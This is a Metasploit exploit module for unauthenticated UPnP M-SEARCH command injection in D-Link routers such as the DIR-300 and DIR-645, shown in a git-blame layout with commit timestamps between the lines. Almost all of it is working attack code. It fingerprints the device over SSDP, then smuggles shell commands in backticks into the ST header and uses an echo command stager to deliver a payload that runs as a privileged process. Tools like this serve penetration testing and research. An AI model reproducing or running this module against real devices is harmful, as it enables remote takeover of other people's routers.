2014-06-16 20:12:15 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-06-16 20:12:15 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2014-07-11 14:35:21 +00:00
|
|
|
Rank = ExcellentRanking
|
2014-06-16 20:12:15 +00:00
|
|
|
|
2014-07-08 19:58:15 +00:00
|
|
|
include Msf::Exploit::CmdStager
|
2014-06-16 20:12:15 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2014-07-11 14:35:21 +00:00
|
|
|
'Name' => 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection',
|
2014-06-16 20:12:15 +00:00
|
|
|
'Description' => %q{
|
|
|
|
Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast
|
2014-07-13 11:24:54 +00:00
|
|
|
requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip
|
2014-06-16 20:12:15 +00:00
|
|
|
has initially reported the DIR-815 vulnerable. Probably there are other devices also
|
|
|
|
affected.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Zachary Cutlip', # Vulnerability discovery and initial exploit
|
2014-07-11 14:17:34 +00:00
|
|
|
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers
|
2014-06-16 20:12:15 +00:00
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
2014-07-11 14:17:34 +00:00
|
|
|
['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
|
|
|
|
['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
|
2014-06-16 20:12:15 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Feb 01 2013',
|
|
|
|
'Privileged' => true,
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'MIPS Little Endian',
|
|
|
|
{
|
|
|
|
'Platform' => 'linux',
|
|
|
|
'Arch' => ARCH_MIPSLE
|
|
|
|
}
|
|
|
|
],
|
2014-07-11 14:17:34 +00:00
|
|
|
[ 'MIPS Big Endian', # unknown if there are big endian devices out there
|
2014-06-16 20:12:15 +00:00
|
|
|
{
|
|
|
|
'Platform' => 'linux',
|
2015-05-04 10:55:21 +00:00
|
|
|
'Arch' => ARCH_MIPSBE
|
2014-06-16 20:12:15 +00:00
|
|
|
}
|
2014-07-11 14:17:34 +00:00
|
|
|
]
|
2014-06-16 20:12:15 +00:00
|
|
|
],
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
))
|
2014-07-11 14:17:34 +00:00
|
|
|
|
2014-06-16 20:12:15 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RHOST(),
|
2014-07-11 14:17:34 +00:00
|
|
|
Opt::RPORT(1900)
|
2014-06-16 20:12:15 +00:00
|
|
|
], self.class)
|
|
|
|
|
2014-07-11 14:17:34 +00:00
|
|
|
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
|
2014-06-16 20:12:15 +00:00
|
|
|
end
|
|
|
|
|
2014-07-02 19:24:50 +00:00
|
|
|
def check
|
|
|
|
configure_socket
|
|
|
|
|
|
|
|
pkt =
|
|
|
|
"M-SEARCH * HTTP/1.1\r\n" +
|
|
|
|
"Host:239.255.255.250:1900\r\n" +
|
|
|
|
"ST:upnp:rootdevice\r\n" +
|
|
|
|
"Man:\"ssdp:discover\"\r\n" +
|
|
|
|
"MX:2\r\n\r\n"
|
|
|
|
|
|
|
|
udp_sock.sendto(pkt, rhost, rport, 0)
|
|
|
|
|
|
|
|
res = nil
|
|
|
|
1.upto(5) do
|
|
|
|
res,_,_ = udp_sock.recvfrom(65535, 1.0)
|
2014-07-11 14:17:34 +00:00
|
|
|
break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
|
|
|
|
udp_sock.sendto(pkt, rhost, rport, 0)
|
2014-07-02 19:24:50 +00:00
|
|
|
end
|
|
|
|
|
2014-07-02 19:28:39 +00:00
|
|
|
# UPnP response:
|
|
|
|
# [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1
|
|
|
|
# we do not check for the Device ID (DIR-645) and for the firmware version because there are different
|
|
|
|
# dlink devices out there and we do not know all the vulnerable versions
|
|
|
|
|
2014-07-02 19:24:50 +00:00
|
|
|
if res && res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
end
|
|
|
|
|
|
|
|
Exploit::CheckCode::Unknown
|
|
|
|
end
|
|
|
|
|
2014-06-16 20:12:15 +00:00
|
|
|
def execute_command(cmd, opts)
|
|
|
|
configure_socket
|
|
|
|
|
|
|
|
pkt =
|
|
|
|
"M-SEARCH * HTTP/1.1\r\n" +
|
|
|
|
"Host:239.255.255.250:1900\r\n" +
|
|
|
|
"ST:uuid:`#{cmd}`\r\n" +
|
|
|
|
"Man:\"ssdp:discover\"\r\n" +
|
|
|
|
"MX:2\r\n\r\n"
|
|
|
|
|
|
|
|
udp_sock.sendto(pkt, rhost, rport, 0)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2014-07-14 18:29:07 +00:00
|
|
|
print_status("#{peer} - Trying to access the device via UPnP ...")
|
2014-07-02 19:24:50 +00:00
|
|
|
|
|
|
|
unless check == Exploit::CheckCode::Detected
|
2014-07-14 18:29:07 +00:00
|
|
|
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
|
2014-07-02 19:24:50 +00:00
|
|
|
end
|
|
|
|
|
2014-07-14 18:29:07 +00:00
|
|
|
print_status("#{peer} - Exploiting...")
|
2014-06-16 20:12:15 +00:00
|
|
|
execute_cmdstager(
|
2014-07-08 19:58:15 +00:00
|
|
|
:flavor => :echo,
|
2014-06-16 20:12:15 +00:00
|
|
|
:linemax => 950
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
# the packet stuff was taken from the module miniupnpd_soap_bof.rb
|
|
|
|
# We need an unconnected socket because SSDP replies often come
|
|
|
|
# from a different sent port than the one we sent to. This also
|
|
|
|
# breaks the standard UDP mixin.
|
|
|
|
def configure_socket
|
|
|
|
self.udp_sock = Rex::Socket::Udp.create({
|
|
|
|
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
|
|
|
|
})
|
|
|
|
add_socket(self.udp_sock)
|
|
|
|
end
|
|
|
|
|
2014-07-14 18:29:07 +00:00
|
|
|
# Need to define our own rhost/rport/peer since we aren't
|
|
|
|
# using the normal mixins
|
2014-06-16 20:12:15 +00:00
|
|
|
|
|
|
|
def rhost
|
|
|
|
datastore['RHOST']
|
|
|
|
end
|
|
|
|
|
|
|
|
def rport
|
|
|
|
datastore['RPORT']
|
|
|
|
end
|
|
|
|
|
2014-07-14 18:29:07 +00:00
|
|
|
def peer
|
|
|
|
"#{rhost}:#{rport}"
|
|
|
|
end
|
|
|
|
|
2014-06-16 20:12:15 +00:00
|
|
|
# Accessor for our UDP socket
|
|
|
|
attr_accessor :udp_sock
|
|
|
|
|
|
|
|
end
|